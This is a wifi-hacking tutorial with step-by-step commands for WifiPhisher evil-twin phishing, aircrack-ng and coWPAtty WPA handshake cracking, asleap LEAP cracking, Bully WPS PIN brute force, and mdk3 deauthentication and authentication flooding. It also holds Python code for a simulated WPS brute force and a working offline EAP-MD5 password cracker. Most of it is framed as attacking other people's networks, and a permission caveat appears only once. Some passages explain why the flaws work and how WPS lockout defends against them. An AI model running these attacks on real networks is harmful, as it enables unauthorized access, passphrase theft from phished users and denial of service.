Wireless Attack
Lots of users have asked me about wifi hacking, for example:
- How to hack wifi using social engineering or phishing techniques.
- How to hack wifi from the Kali Linux terminal.
- How to crack WEP-protected wifi.
- How to crack WPA/WPA2-protected wifi using a dictionary.
- How to crack WPA/WPA2-protected wifi without a dictionary.
- How to hack wifi using tools such as WifiPhisher, Aircrack-ng, Asleap, Bully, coWPAtty, eapmd5pass, Fern-wifi-cracker, Kismet, GISKismet, mdk3, Wifi-honey, Wifitap and Wifite.
Some of the common wireless network attacks are outlined below.
- Rogue access points
- Evil twin
- Packet sniffing
- War driving
- Replay attacks
- Near field communication
- WPS attacks
- WEP/WPA attacks
802.11 Wireless Tools
In this text, when we discuss wireless security we are referring to 802.11 networks. IEEE 802.11 is a set of standards from the Institute of Electrical and Electronics Engineers (IEEE) for radio communications used in wireless local area networks (WLANs). IEEE is an organization of engineers, scientists and students that creates standards for the computer and electronics industries so that equipment from different vendors interoperates. The organization numbers the standards it produces for different technologies: 802 groups the standards for local and metropolitan area networks, and .11 narrows that down to wireless LANs. In our discussions you will also notice letters after the number 11 (802.11a, 802.11b, 802.11g, 802.11n). These letters identify amendments to the standard, which specify things such as the frequency band and the bandwidth they use; some amendments, such as 802.11i, specify security methods as well.
802.11 networks are everywhere. The number of shipped 802.11-enabled hardware devices was estimated to exceed 40 million units by the year 2006 (Vladimirov, Gavrilenko, Mikhailovsky). Because of the popularity of this standard and its prevalence in organizational wireless networking, our focus in this text is primarily on 802.11 WLANs. By familiarizing yourself with the various aspects of the 802.11 standards, you are also familiarizing yourself with the technologies employed in the business world.
How to Hack Wifi Using WifiPhisher
Wireless networks can be attacked with a number of tools; some of them are covered below, starting with WifiPhisher, which obtains the passphrase by phishing the users rather than by cracking anything.
Step 1: Download WifiPhisher from GitHub
git clone https://github.com/sophron/wifiphisher.git
Step 2: Navigate to the directory
Next, change into the directory that was created when Wifiphisher was unpacked. In my case, it is /wifiphisher-1.1.
Step 3: Run the wifiphisher.py script with the command
sudo python wifiphisher.py
Step 4: wifiphisher.py needs additional software to run; when it asks, allow it to download and install the missing dependencies.
Step 5: Now disconnect your wireless interfaces from the internet, since wifiphisher needs them for itself, and rerun the script with the command below:
sudo python wifiphisher.py
Step 6: Send Your Attack & Get the Password
Wifiphisher lists the access points it sees. Hit Ctrl + C on your keyboard and you will be prompted for the number of the AP that you would like to attack. In my case, it is 1.
Wifiphisher now deauthenticates every device connected to the victim's access point, starts a fake access point with the same name, and serves a phishing page that asks reconnecting users for the WPA passphrase. The attack succeeds only if a user types the passphrase into that page; it never touches the encryption, so a strong passphrase is no defence against it, and an unexpected router "login" or "firmware upgrade" page is what users need to learn to distrust.
Aircrack-ng is an 802.11 WEP and WPA-PSK key cracking program that can recover keys once enough data packets have been captured. For WEP it implements the standard FMS attack along with optimizations such as the KoreK attacks and the newer PTW attack, which makes it much faster than other WEP cracking tools; for WPA/WPA2-PSK it runs a dictionary attack against a captured 4-way handshake.
How to Hack WPA/WPA2 Protected Wi-Fi Using aircrack-ng
1. Put your wireless card into monitor mode
airmon-ng start wlan0
2. Run airodump-ng on the monitor interface (mon0) to listen to the wireless networks around you and get details about them: BSSID, channel, ESSID and the clients connected to each
3. Sniff on the target's channel (-c 3), filtering on its BSSID (--bssid 11:22:33:44:55:66), writing the capture to disk (-w MTNL), using the monitor mode interface (mon0):
airodump-ng -w <capture file prefix> -c <target channel> --bssid <BSSID of target> mon0
(eg: airodump-ng -w MTNL -c 3 --bssid 11:22:33:44:55:66 mon0)
Leave this running until the top line of the airodump-ng output shows "WPA handshake: 11:22:33:44:55:66". aircrack-ng can do nothing with the capture until a client's 4-way handshake is in it; if no client connects on its own, deauthenticating a connected client with aireplay-ng forces it to reconnect and repeat the handshake.
4. Using the wordlist (-w wordlist.lst), attempt to crack the passphrase in the capture file. airodump-ng numbers its output files, so the capture from the example above is MTNL-01.cap:
aircrack-ng -w wordlist.lst -b 11:22:33:44:55:66 MTNL-01.cap
[ -w = the dictionary file
-b = the MAC address (BSSID) of the access point
MTNL-01.cap = the capture file that contains the authentication handshake ]
Asleap demonstrates a serious deficiency in proprietary Cisco LEAP networks. Since LEAP uses a variant of MS-CHAPv2 for the authentication exchange, it is susceptible to accelerated offline dictionary attacks. Asleap can also attack the Point-to-Point Tunneling Protocol (PPTP), and any MS-CHAPv2 exchange where you can specify the challenge and response values on the command line.
We assume you have run Kismet at the site and determined that the target uses LEAP. Kismet writes a .dump file in the directory you run it from, and that dump file contains the LEAP challenges and responses. Depending on the amount of traffic, asleap will either report the challenge/response pairs it found or report that it found none:
asleap -r Kismet-Apr-29-2008-1.dump
If asleap found challenge and response pairs in the dump file, you can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap you had to use genkeys to generate a lookup file; version 1.4 lets you provide an ASCII dictionary directly with the -W option.
asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt
Bully is a newer implementation of the WPS brute force attack, written in C. It is conceptually identical to other programs, in that it exploits the (now well known) design flaw in the WPS specification: the access point confirms each half of the 8-digit PIN separately, which cuts the search space from ten million PINs to a few thousand guesses. It has several advantages over the original Reaver code, including fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options. It runs on Linux, and was specifically developed to run on embedded Linux systems (OpenWrt, etc.) regardless of architecture.
Bully provides several improvements in the detection and handling of anomalous scenarios. It has been tested against access points from numerous vendors, and with differing configurations, with much success.
Hack Wifi Using Bully
Put Your Wi-Fi Adapter in Monitor Mode
airmon-ng start wlan0
Next, we need to use airodump-ng to see the information on the wireless APs around us.
Use airodump-ng to Get the Necessary Info
Note the BSSID, ESSID and channel of the target. Finally, all we need to do is put this information into our Bully command.
bully mon0 -b 00:25:9C:97:4F:48 -e abcd -c 1
Let's break down that command to see what's happening.
mon0 is the name of the wireless adapter in monitor mode.
-b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
-e abcd is the SSID of the AP.
-c 1 is the channel the AP is broadcasting on.
Many access points lock WPS after a number of failed PIN attempts, so check whether the target already reports WPS as locked (airodump-ng --wps shows this) before spending hours on it.
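Why this brute force is feasible at all, shown as an added example (not code from the page, from Bully or from Reaver). The WPS PIN is 8 digits, 7 digits plus a checksum digit. During the EAP-WSC exchange the access point (acting as the WPS enrollee, while the attacker poses as an external registrar) confirms each half of the PIN separately: it answers M4 with a NACK if the first four digits are wrong, and M6 with a NACK if the last four are wrong. The attacker therefore searches 10^4 first halves and then only 10^3 second halves (the checksum digit is computed), at most 11,000 attempts instead of 10^7. The access point below is a constructed in-memory oracle; no frames are sent anywhere, and the PINs used are sample values chosen here.

```python
#!/usr/bin/env python3
"""Simulation of the WPS split-PIN verification flaw (added example, not Bully's code)."""
from typing import Optional


def wps_checksum(first7: int) -> int:
    """Checksum digit for the 7-digit PIN body, as defined by the WPS specification."""
    acc, n = 0, first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


class FakeAccessPoint:
    """Constructed stand-in for the AP's WPS enrollee: only the two-stage verification leak is modelled."""

    def __init__(self, pin: str):
        if len(pin) != 8 or not pin.isdigit() or int(pin[7]) != wps_checksum(int(pin[:7])):
            raise ValueError("not a valid 8-digit WPS PIN")
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        """Outcome the attacker observes for one PIN: 'M4-NACK', 'M6-NACK' or 'M7' (credentials)."""
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "M4-NACK"   # first half wrong: AP NACKs right after M4
        if pin[4:] != self.pin[4:]:
            return "M6-NACK"   # first half right, second half wrong: AP NACKs after M6
        return "M7"            # both halves right: M7 carries the WPA passphrase


def brute_force_wps(ap: FakeAccessPoint) -> Optional[str]:
    """The Reaver/Bully strategy: find the first half, then the second half, then read M7."""
    first_half = None
    for a in range(10_000):
        if ap.try_pin(f"{a:04d}0000") != "M4-NACK":   # second half is irrelevant at this stage
            first_half = f"{a:04d}"
            break
    if first_half is None:
        return None
    for b in range(1_000):
        body = first_half + f"{b:03d}"
        candidate = body + str(wps_checksum(int(body)))   # 8th digit is never guessed
        if ap.try_pin(candidate) == "M7":
            return candidate
    return None


if __name__ == "__main__":
    target = FakeAccessPoint("12345670")   # constructed target PIN (valid checksum)
    print(brute_force_wps(target), "after", target.attempts, "attempts")
```

Against the sample PIN 12345670 the search needs 1,803 attempts; against 99999995 (the worst case) it needs exactly 11,000. A correctly designed check would only answer after the whole PIN, leaving the attacker with 10^7 candidates, which is why WPS lockout after a few failures, or disabling WPS PIN entirely, is the fix.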
Hack wifi using coWPAtty
coWPAtty is an implementation of an offline dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication for WPA/WPA2 since it is much easier than establishing the RADIUS, supplicant and certificate authority infrastructure needed for WPA-Enterprise. coWPAtty can run an accelerated attack if a precomputed PMK file is available for the SSID being assessed (its companion tool genpmk builds such files).
Commands to crack WPA and WPA2 using coWPAtty
airmon-ng start wlan0
airodump-ng -c [channel id] --write news --bssid [bssid of the wifi] mon0
Once airodump-ng has captured a 4-way handshake (it writes the capture to news-01.cap), we can hand the capture, the SSID and our wordlist to coWPAtty:
cowpatty -f darkc0de.lst -r news-01.cap -s [ESSID of the wifi]
coWPAtty derives the PMK from every word in the wordlist using the SSID as the salt (PBKDF2, 4096 rounds), derives the handshake MIC from it and compares that with the MIC in the captured handshake; when they match, it displays the passphrase of the AP. The PBKDF2 step is the slow part and depends only on the SSID, not on the handshake, which is why a precomputed PMK file for a known SSID makes the attack so much faster.
EAP-MD5 is a legacy authentication mechanism that does not provide sufficient protection for user authentication credentials. Users who authenticate with EAP-MD5 expose themselves to an offline dictionary attack. The tool eapmd5pass reads from a live network interface in monitor mode, or from a stored libpcap capture file, and extracts the portions of the EAP-MD5 authentication exchange. Once the challenge and response have been collected from this exchange, eapmd5pass mounts an offline dictionary attack against the user's password.
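What that offline attack consists of, as an added example (not code from the page or from eapmd5pass). EAP-MD5 is CHAP carried inside EAP (RFC 3748 section 5.4, RFC 1994): the peer answers a challenge with MD5(Identifier || password || Challenge). The challenge and the response both cross the network in the clear, and in 802.11 they are exchanged before any link encryption exists, so whoever sniffs the exchange can test candidate passwords offline with one MD5 each. The Request and Response packets below are constructed in-script, not taken from a real capture; the identifier, user name, challenge bytes and wordlist are sample values chosen here.

```python
#!/usr/bin/env python3
"""Offline dictionary attack on EAP-MD5 (added example, not eapmd5pass's code)."""
import hashlib
import struct
from typing import Iterable, Optional

EAP_REQUEST, EAP_RESPONSE = 1, 2
EAP_TYPE_MD5_CHALLENGE = 4


def build_eap_md5(code: int, identifier: int, value: bytes, name: bytes = b"") -> bytes:
    """EAP packet: code, identifier, length, type=4, value-size, value, name."""
    body = struct.pack("!BB", EAP_TYPE_MD5_CHALLENGE, len(value)) + value + name
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap_md5(pkt: bytes) -> dict:
    """Pull code, identifier, value and name out of an EAP-MD5 packet; reject anything else."""
    if len(pkt) < 6:
        raise ValueError("packet too short for EAP-MD5")
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if length != len(pkt) or pkt[4] != EAP_TYPE_MD5_CHALLENGE:
        raise ValueError("not an EAP-MD5 packet")
    size = pkt[5]
    if 6 + size > len(pkt):
        raise ValueError("value-size exceeds packet length")
    return {"code": code, "id": identifier, "value": pkt[6:6 + size], "name": pkt[6 + size:]}


def eap_md5_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """The CHAP response: MD5 over identifier, password and challenge, in that order."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def crack_eap_md5(request: bytes, response: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Pair the Request with its Response (same identifier) and test each candidate offline."""
    req, resp = parse_eap_md5(request), parse_eap_md5(response)
    if req["code"] != EAP_REQUEST or resp["code"] != EAP_RESPONSE or req["id"] != resp["id"]:
        raise ValueError("request and response do not belong to the same exchange")
    for word in wordlist:
        if eap_md5_response(resp["id"], word.encode(), req["value"]) == resp["value"]:
            return word
    return None


# Constructed sample exchange (not real traffic): identifier 5, user "alice", password chosen here.
CHALLENGE = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE_REQUEST = build_eap_md5(EAP_REQUEST, 5, CHALLENGE, b"radius.example")
SAMPLE_RESPONSE = build_eap_md5(EAP_RESPONSE, 5, eap_md5_response(5, b"winter2008", CHALLENGE), b"alice")
WORDLIST = ["password", "summer2008", "alice123", "winter2008", "qwerty"]

if __name__ == "__main__":
    print("recovered password:", crack_eap_md5(SAMPLE_REQUEST, SAMPLE_RESPONSE, WORDLIST))
```

The identifier check matters when working from a real capture: several EAP exchanges can be interleaved on one network, and an attacker who pairs a Response with the wrong Request simply never finds the password. There is no salt and no iteration count here, which is the whole problem with EAP-MD5 and the reason it is unsuitable for wireless.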
Hack wifi using tool Fern-wifi-cracker
Fern Wifi Cracker is a wireless security auditing and attack program written in Python with the Python Qt GUI library. It can crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet networks.
1. Put the wireless card into monitor mode
airmon-ng start wlan0
2. Launch Fern Wifi Cracker.
Click the drop-down menu at the top of Fern and select your wireless adapter from the list.
Click OK on any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green.
Then click Scan for Access Points.
Fern will scan for wifi networks in range and begin populating the WEP and WPA boxes.
Once Fern Wifi Cracker finishes scanning for networks, select the network you are targeting from either the WEP section or the WPA section. In this example, I am targeting a WEP encrypted network.
Select your target network from the drop-down box and then click the WiFi Attack button to the right.
Kismet is an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It can use other programs to play audio alarms for network events, read out network summaries, or provide GPS coordinates. This is the main package containing the core, client, and server.
GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a database so that the user can generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing.
Use mdk3 to hack wifi
MDK is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it.
SSID Flooding with MDK3
One neat trick that MDK3 can do is SSID flooding, or beacon flooding: MDK3 broadcasts beacon frames for hundreds or even thousands of fake access points, which fill every nearby client's network list.
mdk3 <interface> b -c 1
Authentication Flooding with MDK3
The idea behind authentication flooding is simple. Too many authentication requests at one time may cause the wireless access point to freeze up and perhaps stop working entirely.
mdk3 <interface> a -a <ap_mac address>
Deauthentication Flooding with MDK3
The DoS technique that works best uses deauthentication frames rather than fake authentication requests. 802.11 management frames are not authenticated unless the network uses 802.11w (protected management frames), so a spoofed deauthentication that appears to come from the AP makes every client drop its connection, and clients that reconnect are simply kicked off again.
mdk3 <interface> d -b blacklist_file
-b reads a file containing the MAC addresses to attack (blacklist mode)
Wifi-honey is a script that creates five monitor mode interfaces: four are used as access points and the fifth is used for airodump-ng. The four APs advertise the same ESSID with different security settings (open, WEP, WPA and WPA2), so when a client probes for that ESSID and tries to join one of them you learn which security type its saved profile expects. To make things easier, rather than having five windows, all of this is done in a screen session, which lets you switch between screens to see what is going on. All sessions are labelled so you know which is which.
Broadcast the given ESSID (FreeWiFi) on channel 6 using the wireless interface (wlan0):
root@kali:~# wifi-honey FreeWiFi 6 wlan0
Wifitap is a proof of concept for communication over wifi networks using traffic injection.
Wifitap allows any application to send and receive IP packets using 802.11 traffic capture and injection over a wifi network simply by configuring the wj0 interface it creates, which means:
- setting an IP address consistent with the target network's address range
- routing the desired traffic through it
In particular, it is a cheap method for injecting arbitrary packets into 802.11 frames without a specific library.
In addition, it lets one get around limitations set at the access point level, such as bypassing inter-client communication prevention (e.g. Cisco PSPF) or reaching multiple SSIDs handled by the same access point.
Wifite tools to hack wifi
Wifite attacks multiple WEP, WPA and WPS encrypted networks in a row. It can be automated with only a few arguments and aims to be the "set it and forget it" wireless auditing tool.
Launch wifite from the terminal.
After launching, wifite starts scanning for wireless access points; press Ctrl+C to stop the scan and select the target.
Then enter the target number and hit Enter, e.g. 1.
All of the remaining work, from capturing the handshake to cracking the password, is done by wifite itself.